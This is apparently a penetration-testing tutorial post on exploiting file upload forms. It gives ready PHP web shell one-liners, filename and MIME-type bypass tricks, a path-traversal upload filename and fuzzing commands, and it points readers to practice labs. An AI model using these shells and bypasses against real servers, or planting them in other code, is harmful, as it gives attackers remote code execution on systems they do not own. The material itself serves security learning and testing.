Post 6: File Upload Vulnerabilities
From Upload Field to Remote Code Execution
If a web application allows users to upload files, you’re potentially looking at an RCE jackpot. File upload vulnerabilities occur when the app fails to properly validate or restrict file types, extensions, or paths — allowing attackers to upload malicious files like web shells, scripts, or executables.
This post will teach you how to identify, test, and exploit vulnerable upload forms.
Table of Contents
- Why File Uploads Are Dangerous
- How File Uploads Work
- Common Misconfigurations
- Manual Testing Steps
- Bypassing Extension and MIME Type Filters
- Uploading Web Shells
- File Path Tricks (Traversal, Overwrites)
- Tools and Practice Labs
1. Why File Uploads Are Dangerous
A vulnerable upload can lead to:
- Remote Code Execution (if you upload a script)
- Server-side request forgery (SSRF)
- Local file inclusion or overwrite
- Privilege escalation via log poisoning or cron jobs
It’s a direct path to owning the box.
2. How File Uploads Work
Typically:
- You fill out a form and select a file.
- The file is sent to the server.
- The server saves the file somewhere like
/uploads/or/temp/. - The file is served back or processed.
The application should:
- Restrict extensions (e.g., only
.jpg,.png) - Check content type and headers
- Sanitize the filename
- Validate path and access rights
If any of these fail — you win.
3. Common Misconfigurations
Look for:
- Accepting any file type
- Blacklisting instead of whitelisting
- Filtering based only on file extension
- Not checking content type
- Uploading files to web-accessible directories
- Executing uploaded files as scripts
4. Manual Testing Steps
Step 1: Upload a normal file
Try uploading test.jpg, test.png, test.txt. Confirm:
- Does it get accepted?
- Where is it stored?
- Can you access it via URL?
http://target.com/uploads/test.jpg
If you get a 200 OK — you know where the upload directory is.
Step 2: Try to upload .php, .asp, .jsp
Even if it’s rejected, intercept the request in Burp Suite, and change the file extension or Content-Type manually.
5. Bypassing Extension and MIME Type Filters
Double Extensions:
shell.php.jpg
shell.php;.jpg
shell.ph%00p
Content-Type Spoofing:
In Burp, try:
Content-Type: image/jpeg
Even if the file is PHP.
Rename File in Request:
Some apps use filename from the Content-Disposition header. Try:
Content-Disposition: form-data; name="file"; filename="shell.php"
6. Uploading Web Shells
PHP Shell Example:
<?php system($_GET['cmd']); ?>
Upload as shell.php, then access:
http://target.com/uploads/shell.php?cmd=whoami
Or:
<?=`$_GET[0]`?>
Then:
http://target.com/uploads/shell.php?0=ls
For Windows, use .asp or .aspx shells. For Java-based apps, try .jsp.
7. File Path Tricks (Traversal, Overwrites)
Try uploading with:
../../../../var/www/html/shell.php
If the server does not sanitize the path, you might overwrite files or place your shell in a location that is executed by the server.
Check for:
- Overwriting
index.phpor404.html - Poisoning log files
- Uploading
.htaccessto modify server behavior
8. Tools and Practice Labs
Tools:
- Burp Suite – Intercept and modify file upload requests
- ffuf – Fuzz upload directories:
ffuf -u http://target.com/FUZZ -w wordlists/content.txt
- upload_bypasser.py – Automate common file upload tricks
- weevely – Generate and interact with PHP web shells
Checklist for Upload Testing
| Test | Goal |
|---|---|
| Upload basic file | Find upload directory and behavior |
| Try script extensions | Trigger execution of uploaded file |
| Change Content-Type | Bypass MIME filters |
| Use Burp to modify extension | Trick the backend |
| Access uploaded file directly | Confirm web-accessible path |
| Try double extensions | Bypass frontend checks |
| Upload web shell | Gain command execution |
Practice Labs
- TryHackMe: File Uploads, Inclusion Room, OWASP Labs
- PortSwigger Labs: File upload bypass series
- bWAPP / DVWA: File upload module
- HackTheBox: Boxes tagged with
upload,web,RCE
Coming Up Next
Post 7: Local & Remote File Inclusion (LFI/RFI)
We’ll cover:
- How to read sensitive files (passwd, config)
- Exploiting log files for code execution
- RFI to load malicious scripts remotely
- Detection and real-world exploitation
Let me know when you’re ready to jump into file inclusion.